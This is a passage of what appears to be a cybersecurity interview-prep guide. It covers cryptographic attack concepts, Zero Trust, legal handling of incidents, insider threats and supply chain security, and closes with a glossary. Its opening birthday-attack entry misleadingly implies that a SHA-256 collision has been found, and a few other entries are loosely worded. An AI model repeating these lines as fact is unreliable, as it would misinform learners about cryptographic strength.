Birthday attack: hashing weakness (SHA-256 collision found faster than brute force). With n possible hashes, ~sqrt(n) inputs needed to find collision. Padding oracle: if server responds differently to valid/invalid padding, attacker can decrypt message without key. Hash extension: attacker appends data to message, recalculates hash - used if hash verifies integrity without HMAC. Meet-in-the-middle: 2^(n/2) complexity instead of 2^n. Prevents: use HMAC, salting (prevents rainbow tables), Argon2 (slow hashing), modern ciphers (AES-GCM authenticated encryption), strong key derivation (PBKDF2, bcrypt).
27. What is the Zero Trust architecture and how to implement?
Zero Trust: assume breach, verify everything. Implementation layers: (1) Identity - strong auth (MFA), never trust based on network location, (2) Device - verify posture (patched, antivirus active), (3) Network - microsegmentation, block unless explicitly allowed, (4) Application - principle of least privilege, monitor all access, (5) Data - encryption at rest/transit, DLP. Key difference from perimeter security: old model trusts inside network, doesn't verify internal. Zero Trust requires: identity provider (Okta, Azure AD), device management, network ACLs, monitoring. Deployment: pilot with non-critical services, gradually expand. Modern cloud/remote work makes Zero Trust essential.
28. How do you handle security incidents with legal implications?
Legal considerations during incident: (1) Preserve evidence - follow chain of custody, image disks, don't contaminate, (2) Notify - data breach notification law varies by state/country (72h GDPR), legal team involved, (3) Investigation - work with law enforcement if criminal, hire forensic firm if litigation likely, (4) Communication - carefully word notifications (avoid admissions of guilt), (5) Documentation - comprehensive record for court, (6) Compliance - report to regulators (FBI, financial regulators), (7) Privacy - remove PII from reports, (8) Remediation - fix without destroying evidence. Incident response plan must include legal team involvement from start.
29. What is insider threat and how to detect?
Insider threat: employee/contractor abuses legitimate access for harm (theft of IP, sabotage, espionage). Detection: (1) User behavior analytics (UBA) - baseline normal activity, alert on deviations (accessing files outside job, after hours activity), (2) File activity - large downloads, unusual file access, printer usage (printing documents), (3) Email - mass forwarding to personal email, strange recipients, (4) Database - unusual queries, large data exports, (5) Privilege changes - unnecessary elevation, (6) Psychological signs - disgruntled, job termination notice, financial distress. Prevention: least privilege, job rotation, separation of duties, acceptable use policy, background checks, monitoring. Difficult - must balance monitoring with privacy/employee morale.
30. What is supply chain security?
Supply chain security: securing vendors/dependencies/software you use. Risks: compromised vendor (attacker compromises 3rd party software → distributed to all customers - SolarWinds), vulnerable dependencies (npm packages with vulnerabilities), typosquatting (malicious package with similar name), software tampering, licensing violations. Defenses: (1) Vendor assessment - SOC 2 certification, security questionnaire, (2) Dependency scanning - know what versions used, check for CVEs (Dependabot, Snyk), (3) Code review - examine 3rd party code, (4) Signed releases - verify package signatures, (5) Sandboxing - run in isolated environment, (6) Monitoring - detect compromise detection, (7) Incident plan - how to respond if vendor compromised. Essential for cloud/open-source heavy environments.

Glossary

APT (Advanced Persistent Threat)
Long-term, stealthy attack by sophisticated adversary (usually state-sponsored), maintains presence for months.
CVSS (Common Vulnerability Scoring System)
Standardized scoring (0-10) of vulnerability severity for prioritizing patching efforts.
EDR (Endpoint Detection & Response)
Tool installed on systems to detect/respond to threats (process execution, file changes, network activity).
IOC (Indicator of Compromise)
Artifact indicating compromise: file hash, IP, domain, URL, email associated with attack.
SIEM (Security Information & Event Management)
Centralizes log collection, correlation, and alerting from all security tools and systems.
WAF (Web Application Firewall)
Firewall protecting web applications from Layer 7 attacks (XSS, SQL injection, DDoS).
Zero Trust
Security architecture assuming no implicit trust - verify every access regardless of location.
OSINT (Open Source Intelligence)
Intelligence gathering from public sources (websites, social media, DNS records, Shodan).
C2 (Command & Control)
Infrastructure attacker uses to communicate with and control compromised systems.
TTP (Tactic, Technique, Procedure)
Attacker's methods - tactics are goals, techniques are how-to, procedures are specific implementation.
Patch Management
Process of regularly updating software/OS to fix vulnerabilities before exploitation.
Least Privilege
Security principle - users/applications given minimum necessary permissions, nothing more.
SOC (Security Operations Center)
Team monitoring security 24/7, investigating alerts, responding to incidents from SIEM.
MFA (Multi-Factor Authentication)
Authentication requiring multiple factors (password, phone, fingerprint) - defeats credential theft.
Defense in Depth
Multiple security layers so single breach doesn't compromise entire system.